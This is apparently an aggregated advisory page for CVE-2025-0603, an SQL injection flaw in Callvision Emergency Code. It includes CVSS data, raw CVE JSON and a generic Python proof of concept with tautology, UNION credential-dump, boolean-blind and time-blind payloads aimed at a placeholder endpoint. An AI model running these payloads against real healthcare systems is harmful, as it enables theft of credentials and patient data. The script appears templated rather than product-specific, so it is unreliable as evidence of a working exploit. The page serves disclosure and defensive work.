Security Vulnerability Report
CVE-2025-0603 CVSS 9.8 CRITICAL

Published: 2025-10-07 12:15:39
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Callvision Healthcare Callvision Emergency Code allows SQL Injection, Blind SQL Injection. This issue affects Callvision Emergency Code: before V3.0.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Callvision Emergency Code < V3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-0603 - Callvision Emergency Code SQL Injection PoC
# Vulnerability: SQL Injection (including Blind SQL Injection)
# Affected: Callvision Emergency Code before V3.0
# CVSS: 9.8 (CRITICAL)
import time

import requests

TARGET_URL = "http://target-host/callvision/endpoint"  # Adjust the target endpoint
INJECTION_PARAM = "id"  # Adjust the vulnerable parameter name


def normal_request(param_value):
    """Send a normal request to compare responses"""
    params = {INJECTION_PARAM: param_value}
    response = requests.get(TARGET_URL, params=params, timeout=10)
    return response


def test_sql_injection():
    """Test for SQL Injection vulnerability"""
    # Test 1: Basic SQL Injection detection
    payload = "1' OR '1'='1"
    response = normal_request(payload)
    print(f"[+] Test 1 - Basic SQLi payload: {payload}")
    print(f"[+] Response status: {response.status_code}")
    print(f"[+] Response length: {len(response.text)}")

    # Test 2: UNION-based SQL Injection to extract data
    union_payload = "1' UNION SELECT NULL,username,password FROM users-- -"
    response = normal_request(union_payload)
    print(f"\n[+] Test 2 - UNION-based SQLi: {union_payload}")
    print(f"[+] Response: {response.text[:500]}")

    # Test 3: Boolean-based Blind SQL Injection
    true_payload = "1' AND 1=1-- -"
    false_payload = "1' AND 1=2-- -"
    true_response = normal_request(true_payload)
    false_response = normal_request(false_payload)
    print(f"\n[+] Test 3 - Boolean-based Blind SQLi")
    print(f"[+] True condition response length: {len(true_response.text)}")
    print(f"[+] False condition response length: {len(false_response.text)}")
    if len(true_response.text) != len(false_response.text):
        print("[!] Boolean-based Blind SQL Injection confirmed!")

    # Test 4: Time-based Blind SQL Injection
    time_payload = "1' AND SLEEP(5)-- -"
    start = time.time()
    response = normal_request(time_payload)
    elapsed = time.time() - start
    print(f"\n[+] Test 4 - Time-based Blind SQLi")
    print(f"[+] Elapsed time: {elapsed:.2f} seconds")
    if elapsed > 4:
        print("[!] Time-based Blind SQL Injection confirmed!")

    # Test 5: Extract database version (MySQL assumed)
    version_payload = "1' AND (SELECT SUBSTRING(@@version,1,1))='5'-- -"
    response = normal_request(version_payload)
    print(f"\n[+] Test 5 - Database version fingerprinting")


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-0603 PoC - Callvision Emergency Code SQL Injection")
    print("=" * 60)
    test_sql_injection()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-0603", "sourceIdentifier": "[email protected]", "published": "2025-10-07T12:15:38.710", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Callvision Healthcare Callvision Emergency Code allows SQL Injection, Blind SQL Injection.This issue affects Callvision Emergency Code: before V3.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0320", "source": "[email protected]"}]}}